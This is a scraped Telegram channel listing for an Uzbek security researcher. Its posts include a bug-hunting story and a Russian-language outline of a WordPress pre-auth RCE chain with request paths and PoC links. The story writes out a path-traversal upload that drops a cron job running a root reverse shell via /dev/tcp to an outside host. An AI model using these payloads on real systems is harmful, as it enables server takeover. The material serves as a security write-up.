JavaSec
СтатистикаBu yerda faqatgina cyber security haqida emas, shunchaki Owner o'zining fikri va tajribasini ulashib boradi About: Team Lead @TuranSecurity | Red-teamer (CPTS, CWEE,CAPE)|CVE 2x Nvidia, 1x Dolibarr | 2x 0day from ZDI | CTF player | Thoughts & life
- Последний пост
- 12 авг.
- Последнее чтение
- 15 авг.
- Постов за неделю
- 4
- Всего постов
- 24
- Тип
- открытый
- Язык
- узбекский
- В каталоге с
- 12 авг.
- 1/24сутки в ленте
- 208
- 1/48двое суток
- 238
- 1/72трое суток
- 257
Оценка по просмотрам недавних постов: пост набирает почти всё за первые сутки.
Посты
Node.js. Webshell befoyda. Lekin...👀 Path traversal orqali RCE olish haqida eshitganmisiz? Bug hunting vaqtida unauth upload function topib oldim. Birinchi narsa — stack tekshirdim. Node.js. Demak webshell yuklashni deyarli foydasi yo'q, ko'pchilik shu yerda…
Node.js. Webshell befoyda. Lekin...👀 Path traversal orqali RCE olish haqida eshitganmisiz? Bug hunting vaqtida unauth upload function topib oldim. Birinchi narsa — stack tekshirdim. Node.js. Demak webshell yuklashni deyarli foydasi yo'q, ko'pchilik shu yerda to'xaydi va keyingisiga o'tadi. Lekin men filename parametriga e'tibor berdim. Odatda bu parametr serverda fayl nomini belgilaydi. Sanitize qilinmagan bo'lsa — path traversal. Tekshirdim: filename=../../../../../../etc/passwd Server 200 OK javob qaytardi. Xato yo'q. Endi asosiy savol — process qaysi user bilan ishlayapti? Agar www-data bo'lsa /etc ga yoza olmayman. Root bo'lsa — boshqa gap. filename=../../../../../../etc/cron.d/backdoor file body'ga esa: * * * * * root bash -i >& /dev/tcp/x.x.x.x/4444 0>&1 Server 200 OK. Yuklandi. Endi faqat cron daemon ishlayaptimi degan savol qoldi — va u ishlayotgandi. Netcat'ni yoqib 60 soniya kutdim. connect to [attacker] from [target] uid=0(root) gid=0(root) groups=0(root) CVE kerak emas. 0day kerak emas. Webshell ham kerak emas. Faqat sanitize qilinmagan bitta parametr va root sifatida ishlaydigan bitta process. Asosiy muammo kod ichida emas — uni kim yozganida edi.🙂 Telegram📱 Linkedin 📱 Web✈️
✅️ Sababi oddiy: AI agentlarga to'g'ri topshiriq berish va ular yaratgan tizimni boshqarish uchun dastlab o'zingiz "kadr ortida" nimalar bo'layotganini hamda dastur arxitekturasini 100% tushunishingiz kerak. Dasturlash asoslari va tizim mantig'ini bilmasdan turib, AI agentlarini samarali ishlata olmaysiz. Avval poydevorni mustahkam qilib olamiz, keyin esa jarayonni to'liq avtomatlashtirib, tezlikni oshiramiz!
🌙 Hozirgi asosiy fokusimiz va kelgusi Roadmap haqida qisqacha 🎮 Avvalo, asosiy e'tiborni loyihalarni 0 dan AI yordamida ko'tarishga qaratamiz. Bu jarayonda siz shunchaki tayyor koddan foydalanmay, balki tizim arxitekturasini qurish, ma'lumotlar bazasi strukturasini to'g'ri loyihalash va mantiqiy bog'lanishlarni (business logic) mustaqil ravishda ishlab chiqasiz. Shu tariqa butun boshli tizim qanday ishlashini amaliyotda chuqur tushunib olasiz hamda Next.js, NestJS va Telegram Bot yaratishni to'liq o'zlashtirasiz. Keyingi bosqichda esa Claude bo'yicha to'liq kurs taqdim etiladi. U yerda biz sun'iy intellekt agentlari (AI agents) orqali butun boshli loyihalarni avtomatlashtirilgan holda quramiz. 🛌 Nima uchun aynan bunday roadmap? Keyingi postda tushuntirib beraman
видео или голосовое, без подписи
видео или голосовое, без подписи
видео или голосовое, без подписи
Consistency. Telegram📱 Linkedin 📱 Web✈️
видео или голосовое, без подписи
👩💻 #web #offense #заметки #события ➡wp2shell — unauth RCE чейн, уязвимы WordPress'ы версий [включительно]: ▪️ 6.9.0 – 6.9.4 (2 декабря – 11 марта 2026) ▪️ 7.0.0 – 7.0.1 (20 мая – 9 июля 2026) ▪️ немного* 6.8.0 – 6.8.5 (*только SQLi) 🔗 Чекер: wp2shell.com 🔗 PoC: github.com/Icex0/wp2shell-poc 🔗 PoC: github.com/0xsha/wp2shell 🔗 PoC: github.com/dinosn/wp2shell-lab 🔗 PoC: github.com/sergiointel/wp2shell-poc ⚡️ ШАГ 1: CVE-2026-63030 0️⃣ POST /wp-json/batch/v1 или POST /?rest_route=/batch/v1 — unauth метод, принимающий целый список подзапросов к API в виде JSON, прим.: { "requests": [ { "path": "/wp/v2/posts" }, { "method": "POST", "path": "/wp/v2/users/me" } ] } 1️⃣ Метод поверяет каждый запрос➡️параллельно собирает 2 массива с результатами: $matches + $validation; Если какой-то запрос не прошёл проверку** wp_parse_url() — массивы $matches + $validation рассинхронизируются➡️один подзапрос может быть выпущен с хендлером другого подзапроса; **Например, такой запрос: GET http://: 2️⃣ Далее рассинхрон поможет сметчить привилегированный хендлер (из $match) + с методом, для которого хочется обойти валидацию; ⚡ *ШАГ 2: CVE-2026-60137 0️⃣ GET /wp/v2/posts/<id> — метод, который после валидации передаёт свои параметры (author_exclude, orderby, per_page, ...) функции get_items(); 1️⃣ author_exclude➡️мапится в WP_Query.author__not_in, который вставляется в SQL запрос; ⬆️ ИТОГ: можем вызвать GET /wp/v2/posts/999999?author_exclude=<payload> [в составе batch-запроса] в обход проверок! ➡Почитать ещё: ▪️ ‟wp2shell: Pre Authentication RCE in WordPress Core” ▪️ ‟Exploit brokers pay $500,000 for a WordPress RCE. I found one with GPT5.6 Sol Ultra and $25” ▪️ ‟wp2shell hits WordPress: detecting pre-auth RCE from plugin drop to command execution”
nobody cares. nobody feels bad for you. nobody believes in you. prove to yourself and only yourself. lock in for you, nobody else.
There is no light for those who don’t know darkness… Peace of cake Telegram📱 Linkedin 📱 Web✈️
@azim_pulat
CWEE, CAPE
Pulim ko’p bo’lsin desangiz: > Onangizga bering.
видео или голосовое, без подписи
There is no light for those who don’t know darkness… Peace of cake Telegram📱 Linkedin 📱 Web✈️
Guess what…
Вайбкодинг. День 2
Muxumi tajriba…